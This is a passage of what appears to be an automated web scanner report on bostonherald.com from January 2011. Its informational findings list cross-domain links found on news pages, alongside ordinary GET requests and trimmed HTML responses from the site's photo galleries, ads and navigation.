ional/view.bg?articleid=1310044" title="Bitter loss for Patriots fans"
onclick="switchPhoto('196574');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="196574" src="http://multimedia.heraldinteractive.com/images/20110117/stp/eb8f92_c06447_ltpBelichickC011711.jpg" title="Bill Bellichick speaks during a press conference."
alt="Angela Rowlings" style="margin:0 2px" />
</a>
...[SNIP]...
s/regional/view.bg?articleid=1310026" title="Man dies in Saugus blaze"
onclick="switchPhoto('196439');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="196439" src="http://multimedia.heraldinteractive.com/images/20110116/stp/806803_fire_01172011.jpg" title="DEADLY: A fire broke out early
yesterday morning in a Saugus
home on Lincoln Avenue, killing
Steven Clain, 53, who was found unconcious in an upstairs
bedroom."
alt="Faith Ninivaggi" style="margin:0 2px" />
</a>
...[SNIP]...
title="We Hear: Siobhan Magnus, Melissa Leo, Steven Tyler and more..."
onclick="switchPhoto('196499');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="196499" src="http://multimedia.heraldinteractive.com/images/20110117/stp/53246b_ltpMelissaLeo011711.jpg" title="Melissa Leo arrives at the Golden Globe Awards Sunday, Jan. 16, 2011, in Beverly Hills, Calif."
alt="AP" style="margin:0 2px" />
</a>
...[SNIP]...
"Tracked Down: Bob Saget, Julian Edelman, Marquis Daniels and more..."
onclick="switchPhoto('196489');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="196489" src="http://multimedia.heraldinteractive.com/images/20110117/stp/6af995_saget_01172011.jpg" title="Bob Saget."
alt="AP (file)" style="margin:0 2px" />
</a>
...[SNIP]...
all/patriots/view.bg?articleid=1310011" title="No defense for letdown"
onclick="switchPhoto('196488');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="196488" src="http://multimedia.heraldinteractive.com/images/20110117/stp/67f0e1_jets_01172011.jpg" title="
GOOD NIGHT: Mark Sanchez (6) and Robert Turner (75) celebrate Shonn Greene’s touchdown late in the Jets’ win yesterday over the Patriots."
alt="Stuart Cahill" style="margin:0 2px" />
</a>
...[SNIP]...
tle="Despite celeb fans’ love, Pats’ win not in the stars"
onclick="switchPhoto('196434');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="196434" src="http://multimedia.heraldinteractive.com/images/20110116/stp/785d22_track_01172011.jpg" title="From left, New England Patriots cheese Robert Kraft,
rocker Jon Bon Jovi and coach Bill Belichick chat before yesterday’s New York Jets matchup at Gillette Stadium."
alt="Matt Stone" style="margin:0 2px" />
</a>
...[SNIP]...
tle="Despite celeb fans’ love, Pats’ win not in the stars"
onclick="switchPhoto('196433');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="196433" src="http://multimedia.heraldinteractive.com/images/20110116/stp/ff2076_sully_01172011.jpg" title="Sully Erna of Godsmack sings the national anthem at the Patriots-Jets smackdown yesterday at Gillette Stadium."
alt="Stuart Cahill" style="margin:0 2px" />
</a>
...[SNIP]...
tle="Despite celeb fans’ love, Pats’ win not in the stars"
onclick="switchPhoto('196435');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="196435" src="http://multimedia.heraldinteractive.com/images/20110116/stp/bbd1bc_brown_01172011.jpg" title="U.S. Sen. Scott Brown has wife Gail
Huff’s back at
yesterday’s
Patriots-Jets
tilt at Gillette
Stadium."
alt="Matt Stone" style="margin:0 2px" />
</a>
...[SNIP]...
leid=1309954" title="3 young women die in stampede at Hungarian disco"
onclick="switchPhoto('196370');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="196370" src="http://multimedia.heraldinteractive.com/images/20110116/stp/719338_stamp.jpg" title="People stand outside the West Balkan night club in Budapest, Hungary, Sunday, in the early hours, after three girls died in a stampede. "
alt="AP" style="margin:0 2px" />
</a>
...[SNIP]...
eid=1309953" title="Hugo Chavez calls for conciliation between rivals"
onclick="switchPhoto('196369');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="196369" src="http://multimedia.heraldinteractive.com/images/20110116/stp/717f4b_chavez.jpg" title="Venezuela’s President Hugo Chavez, speaks during his annual state of the union address at the National Assembly in Caracas, Venezuela, Saturday."
alt="AP" style="margin:0 2px" />
</a>
...[SNIP]...
tle="Sidetracks: Sully Erna, Mark Wahlberg, Joe Goodwin and more..."
onclick="switchPhoto('196337');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="196337" src="http://multimedia.heraldinteractive.com/images/20110116/stp/753d41_33c082_Mark_09122010.jpg" title="Mark Wahlberg "
alt="" style="margin:0 2px" />
</a>
...[SNIP]...
f="/track/inside_track/view.bg?articleid=1309885" title="Spring fever"
onclick="switchPhoto('196331');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="196331" src="http://multimedia.heraldinteractive.com/images/20110116/stp/e39a53_Ryankalish.jpg" title=" Ryan Kalish shoots pool with Caius Spring, 10."
alt="" style="margin:0 2px" />
</a>
...[SNIP]...
=1309874" title="Packers’ Tramon Williams has a shining quarter"
onclick="switchPhoto('196323');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="196323" src="http://multimedia.heraldinteractive.com/images/20110116/stp/c5feb3_tram.jpg" title="Green Bay Packers cornerback Tramon Williams (38) intercepts a pass in the end zone that was intended for Atlanta Falcons wide receiver Michael Jenkins (12) during the first half of an NFL divisional playoff game on Saturday, in Atlanta."
alt="AP" style="margin:0 2px" />
</a>
...[SNIP]...
eid=1309857" title="Ravens’ vaunted skill players let them down"
onclick="switchPhoto('196306');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="196306" src="http://multimedia.heraldinteractive.com/images/20110116/stp/67fd81_ravens01162011.jpg" title="Baltimore Ravens quarterback Joe Flacco (5) and safety Ed Reed (20) walk down the tunnel after a 31-24 loss to the Pittsburgh Steelers in an NFL divisional football game in Pittsburgh, Saturday."
alt="AP" style="margin:0 2px" />
</a>
...[SNIP]...
w.bg?articleid=1309832" title="Brockton man killed in double shooting"
onclick="switchPhoto('196300');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="196300" src="http://multimedia.heraldinteractive.com/images/20110116/stp/fd706e_baby01162011.jpg" title="GRIEF-STRICKEN: Chimora Miranda, 21, with 8-month-old daughter Alayna Alima Cardoso, mourns her boyfriend’s death yesterday. Aderito Cardoso died Saturday morning after being shot."
alt="Faith Ninivaggi" style="margin:0 2px" />
</a>
...[SNIP]...
iew.bg?articleid=1309815" title="It was foul talk, ‘24/7’"
onclick="switchPhoto('196352');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="196352" src="http://multimedia.heraldinteractive.com/images/20110116/stp/ebb30d_hbo.jpg" title="WINTER OF DISCONTENT: When HBO crews focused on Sidney Crosby and the Penguins in chronicling the road to the 2011 Winter Classic against the Capitals, the surprise wasn’t so much in what the cameras caught as the microphones."
alt="HBO" style="margin:0 2px" />
</a>
...[SNIP]...
.bg?articleid=1309811" title="Trash talking’s jealousy speaking"
onclick="switchPhoto('196273');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="196273" src="http://multimedia.heraldinteractive.com/images/20110115/stp/82ac0a_cromartie011611.jpg" title="This Jan. 2, 2011, file photo shows New York Jets’ Antonio Cromartie before an NFL football game against the Buffalo Bills at New Meadowlands Stadium, in East Rutherford, N.J. "
alt="AP (File)" style="margin:0 2px" />
</a>
...[SNIP]...
articleid=1309803" title="Dorchester neighbors join up to see results"
onclick="switchPhoto('196275');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="196275" src="http://multimedia.heraldinteractive.com/images/20110115/stp/edadd3_gooden01162011.jpg" title="BANDING TOGETHER: From left, Margaret Gooden, Marguerite Springer, Trena Ambroise and Cassie Avery-Grice, members of the Dorchester crime watch team Redefining Our Community, patrol the streets."
alt="Mark Garfinkel" style="margin:0 2px" />
</a>
...[SNIP]...
iew.bg?articleid=1309800" title="Jets better pray for some Kryptonite"
onclick="switchPhoto('196288');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="196288" src="http://multimedia.heraldinteractive.com/images/20110116/stp/2586f1_tbrady01172011.jpg" title="Patriots quarterback Tom Brady speaks with reporters standing in front of his locker during a media availability at the NFL football team’s facility in Foxboro Wednesday."
alt="AP" style="margin:0 2px" />
</a>
...[SNIP]...
/bruins/view.bg?articleid=1309795" title="Third time’s no charm"
onclick="switchPhoto('196291');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="196291" src="http://multimedia.heraldinteractive.com/images/20110116/stp/566dba_julien011611.jpg" title="TOO LITTLE, TOO LATE: The Bruins leave the bench as coach Claude Julien looks onto the ice after yesterday’s 3-2 loss to the Penguins at TD Garden."
alt="John Wilcox" style="margin:0 2px" />
</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
<a href="http://www.bostonheraldineducation.com" target="_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" alt="N.I.E." /></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" alt="Smart Edition" /></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/></a>
...[SNIP]...

17.157. http://bostonherald.com/sports/football/patriots/view.bg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/sports/football/patriots/view.bg

Issue detail

The page was loaded from a URL containing a query string:

http://bostonherald.com/sports/football/patriots/view.bg?articleid=1312526

The response contains the following links to other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fsports%2Ffootball%2Fpatriots%2Fview.bg%3Farticleid%3D1312526&c5=&c6=&c15=
http://bostonherald.boocoo.com/
http://bostonheraldnie.newspaperdirect.com/
http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif
http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png
http://cache.heraldinteractive.com/images/siteImages/icons/fontLarge.gif
http://cache.heraldinteractive.com/images/siteImages/icons/fontSmall.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniArticle.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniEmail.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniPrint.gif
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png
http://cache.heraldinteractive.com/images/siteImages/reporters/rapoport_50.jpg?1=1
http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://feeds.feedburner.com/bostonherald/sports/football/patriots/
http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=
http://multimedia.heraldinteractive.com/images/20110128/6666ca_tom_01282011.jpg
http://multimedia.heraldinteractive.com/images/20110128/stp/83f74d_bc_01282011.jpg
http://multimedia.heraldinteractive.com/images/20110128/stp/85bc2c_bill_01282011.jpg
http://multimedia.heraldinteractive.com/images/20110128/stp/c68b4a_brand_01282011.jpg
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif
http://s7.addthis.com/js/200/addthis_widget.js
http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nfl/teams/077/team.aspx?id=077
http://twitter.com/bostonherald
http://www.addthis.com/bookmark.php?v=20
http://www.bostonheraldineducation.com/
http://www.carfind.com/
http://www.collegeanduniversity.net/herald/
http://www.facebook.com/pages/BostonHeraldcom/197211981599
http://www.heraldmedia.com/privacy.html
http://www.homefind.com/
http://www.legacy.com/obituaries/bostonherald/
http://www.massliteracy.org/
http://www.quantcast.com/p-352ZWwG8I7OVQ
http://www.uclick.com/client/boh/sudoc/

Request

GET /sports/football/patriots/view.bg?articleid=1312526 HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:21:36 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 49857

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fsports%2Ffootball%2Fpatriots%2Fview.bg%3Farticleid%3D1312526&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/">
<img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer">
</a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features">

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>

<a href="http://www.addthis.com/bookmark.php?v=20" onmouseover="return addthis_open(this, '', '[URL]', 'Nick Caserio is a Patriots mystery man');" onmouseout="addthis_close();" onclick="return addthis_sendto();"><img class="line_icon" src="/images/siteImages/icons/share-icon-16x16.png" width="16" height="16" alt="Bookmark and Share" style="border:0"/>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
<font color="#888888"> [<a href="http://scores.heraldinteractive.com/merge/tsnform.aspx?c=bostonherald&page=nfl/teams/077/team.aspx?id=077" >team stats</a>
...[SNIP]...
<a href="/sports/football/patriots/view.bg?articleid=1312526&format=comments#CommentsArea"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif"
alt="Comments" />(0) Comments  |  Post / Read Comments</a>
...[SNIP]...
<div id="nextArticleTease" style="display:none">
<img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniArticle.gif"> <b>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<div id="trackPhotoGalleryPicArea"><img id="trackMainImage" class="mainImage" src="http://multimedia.heraldinteractive.com/images/20110128/6666ca_tom_01282011.jpg" alt="
UNDER WATCH: Patriots director of..." /></div>
...[SNIP]...
</div>

<script type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
<a href="/sports/football/patriots/view/20110128belichick_marks_pats_milestone/"><img src="http://multimedia.heraldinteractive.com/images/20110128/stp/85bc2c_bill_01282011.jpg" alt="Bill Belichick marks Patriots’ milestone" /></a>
...[SNIP]...
<a href="/sports/football/patriots/view/20110128castonzo_follows_lead_blockers/"><img src="http://multimedia.heraldinteractive.com/images/20110128/stp/83f74d_bc_01282011.jpg" alt="Anthony Castonzo follows lead blockers" /></a>
...[SNIP]...
<a href="/sports/football/patriots/view/20110128confidence_on_rebound_meriweather_wont_be_bothered_by_naysayers/"><img src="http://multimedia.heraldinteractive.com/images/20110128/stp/c68b4a_brand_01282011.jpg" alt="Brandon Meriweather won’t be bothered by naysayers" /></a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
<a href="http://www.bostonheraldineducation.com" target="_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" alt="N.I.E." /></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" alt="Smart Edition" /></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/></a>
...[SNIP]...

17.158. http://bostonherald.com/track/inside_track/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/track/inside_track/

Issue detail

The page was loaded from a URL containing a query string:

http://bostonherald.com/track/inside_track/?position=1

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Ftrack%2Finside_track%2F&c5=&c6=&c15=
http://bostonherald.boocoo.com/
http://bostonheraldnie.newspaperdirect.com/
http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif
http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png
http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniGallery.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniVideo.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/tools_enews_small.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/tools_home_delivery_small.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/tools_mobile_small.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/tools_news_tips_small.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/tools_rss_small.gif
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js
http://feeds.feedburner.com/bostonherald/track/inside_track/
http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=
http://multimedia.heraldinteractive.com/images/20110124/stp/1de6a0_idol_01252011.jpg
http://multimedia.heraldinteractive.com/images/20110124/stp/ef57fc_razzie_01252011.jpg
http://multimedia.heraldinteractive.com/images/20110125/stp/3701c8_Shore_01272011.jpg
http://multimedia.heraldinteractive.com/images/20110125/stp/d91058_Mark_01272011.jpg
http://multimedia.heraldinteractive.com/images/20110125/stp/e312f8_Lamb_01272011.jpg
http://multimedia.heraldinteractive.com/images/20110126/stp/5ffe30_Shaq_01272011.jpg
http://multimedia.heraldinteractive.com/images/20110126/stp/88a799_NKOTB_01272011.jpg
http://multimedia.heraldinteractive.com/images/20110126/stp/a582a0_Buffett_01272011.jpg
http://multimedia.heraldinteractive.com/images/20110127/stp/33907a_moore_01282011.jpg
http://multimedia.heraldinteractive.com/images/20110127/stp/5e8b2b_ben_01282011.jpg
http://multimedia.heraldinteractive.com/images/20110127/stp/5eb1a6_mitt_01282011.jpg
http://multimedia.heraldinteractive.com/images/20110127/stp/a37654_sheen_01282011.jpg
http://multimedia.heraldinteractive.com/images/20110127/stp/bcd2f7_jul_01282011.jpg
http://multimedia.heraldinteractive.com/images/20110127/stp/df859e_kchesney012711.jpg
http://multimedia.heraldinteractive.com/images/20110128/stp/ea43e1_Cheer_01292011.jpg
http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif
http://twitter.com/bostonherald
http://www.bostonheraldineducation.com/
http://www.carfind.com/
http://www.collegeanduniversity.net/herald/
http://www.facebook.com/pages/BostonHeraldcom/197211981599
http://www.facebook.com/plugins/activity.php?site=http%253A%252F%252Fbostonherald.com&width=300&height=300&header=true&colorscheme=light&font&border_color
http://www.heraldmedia.com/privacy.html
http://www.homefind.com/
http://www.legacy.com/obituaries/bostonherald/
http://www.massliteracy.org/
http://www.quantcast.com/p-352ZWwG8I7OVQ
http://www.uclick.com/client/boh/sudoc/

Request

GET /track/inside_track/?position=1 HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:21:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 56718

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>



<link rel="alternate" title="The Inside Track - Inside Track - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/track/inside_track/" type="application/rss+xml">
<script type="text/javascript" language="JavaScript">
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Ftrack%2Finside_track%2F&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer"></a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features"><!--[if gt IE 6]>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Classifieds <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Classifieds"><!--[if gt IE 6]>
...[SNIP]...
<div><a href="http://bostonherald.boocoo.com/">Boocoo Auctions</a>
...[SNIP]...
<div><a href="http://www.homefind.com">Homefind</a>
...[SNIP]...
<div><a href="http://www.carfind.com">Carfind</a>
...[SNIP]...
<div id="followUs" class="dateBarItem">

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" style="font-weight:bold" target="_blank">Follow Us</a>

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png" />
</a>

<a href="http://twitter.com/bostonherald" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png" />
</a>
...[SNIP]...
<p>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/tools_rss_small.gif"> <a class="orange" style="font-weight:bold" href="/rss">
...[SNIP]...
<p>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/tools_enews_small.gif"> <a class="orange" style="font-weight:bold" href="/users/register/">
...[SNIP]...
<p>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/tools_mobile_small.gif"> <a class="orange" style="font-weight:bold" href="/mobile/info.bg">
...[SNIP]...
<p>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/tools_news_tips_small.gif"> <a class="orange" style="font-weight:bold" href="/about/contact/news_tip.bg">
...[SNIP]...
<p>
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/tools_home_delivery_small.gif"> <a class="orange" style="font-weight:bold" href="/about/home_delivery/">
...[SNIP]...
<a href="/track/inside_track/view/20110129pageant_shaping_up_in_hub/"><img src="http://multimedia.heraldinteractive.com/images/20110128/stp/ea43e1_Cheer_01292011.jpg" alt="WORKOUT QUEEN: New England Patriots cheerleader Michelle Nigro will compete to be Miss Boston."></a>
...[SNIP]...
<a href="/track/inside_track/view/20110128moores_the_merrier_at_hasty_festivities/"><img src="http://multimedia.heraldinteractive.com/images/20110127/stp/bcd2f7_jul_01282011.jpg" alt="Harvard’s Hasty Pudding 2011 Woman of the Year award is presented to actress Julianne Moore who laughs with a Mark Walberg character."></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniGallery.gif" alt="Gallery"><a href="/track/inside_track/view/20110128moores_the_merrier_at_hasty_festivities/srvc=trak&position=">
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniVideo.gif" alt="Video"><a href="/track/inside_track/view/20110128moores_the_merrier_at_hasty_festivities/srvc=trak&position=">
...[SNIP]...
